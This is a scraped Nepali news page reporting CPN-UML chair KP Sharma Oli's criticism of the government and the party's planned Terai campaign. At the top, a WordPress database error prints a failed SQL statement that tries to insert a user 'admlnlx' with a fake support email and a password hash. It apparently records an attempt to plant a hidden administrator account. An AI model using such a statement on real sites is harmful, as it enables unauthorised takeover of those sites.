WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BQlzPGoTD86ViRb23TQDzuyTFrZTiF/', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-01-23 19:45:24', '', 'admlnlx', 'admlnlx')
काठमाडौं,माघ १९ –
नेकपा एमालेका अध्यक्ष केपी शर्मा ओलीले सरकारका टिकाटिप्पणी र व्यवहारप्रति खरो टिप्पणी गरेका छन् । नेकपा एमालेको पार्टी कार्यालय धुम्वाराहीमा पत्रकारहरुसँग कुरा गर्दै उनले यस्तो बताएका हुन् ।प्रमुख प्रतिपक्ष दलले लेखा समितिको सभापति पाउनुपर्ने भए पनि कांग्रेससँग मिलेर आफैं राखेको भन्दै ओलीले प्रतिपक्ष पनि आफैं राख्न सुझाव दिए ।
“लेखा समितिको सभापति एमालेलाई नदिएर एमालेकै उमेदवार हराइएको छ,” ओलीले व्यंग्य गर्दै भने, “किन त्यो मात्रै लिने ? सरकार पनि राम्रो चलाइरहनुभएको छ । यस्तो बेलामा प्रतिपक्ष एमालेलाई किन दिनु ?आफैं राख्नुस् ।” प्रधानमन्त्रीले वाईसीयललाई प्रतिकारमा उत्रिन निर्देशन दिएको उल्लेख गर्दै त्यो एमालेलाई नै भनेको ओलीको भनाई थियो । “उहाँले त वाईसीयललाई भिड्न तयार हुन भन्नुभयो, मैले प्रधानमन्त्रीलाई लौ भिड्न आउनुस् भन्न मिल्दैन, आफैं सम्हालिँदा राम्रो हुन्छ ।”
उनले सरकार निर्वाचन नगराउन षडयन्त्रमा लागेको बताउँदै एमालेलाई कुनै पनि हालतमा मान्य नहुने धारणा राखे ।एमालेले फागुन २१ देखि १५ दिने तराई अभियान पनि सुरु गर्ने जानकारी दिइएको थियो । फागुन २१ देखि चैत ५ गतेसम्म गरिने कार्यक्रम काकडभिट्टाबाट सुरु भएर महाकाली पुगेर टुंगिन्छ ।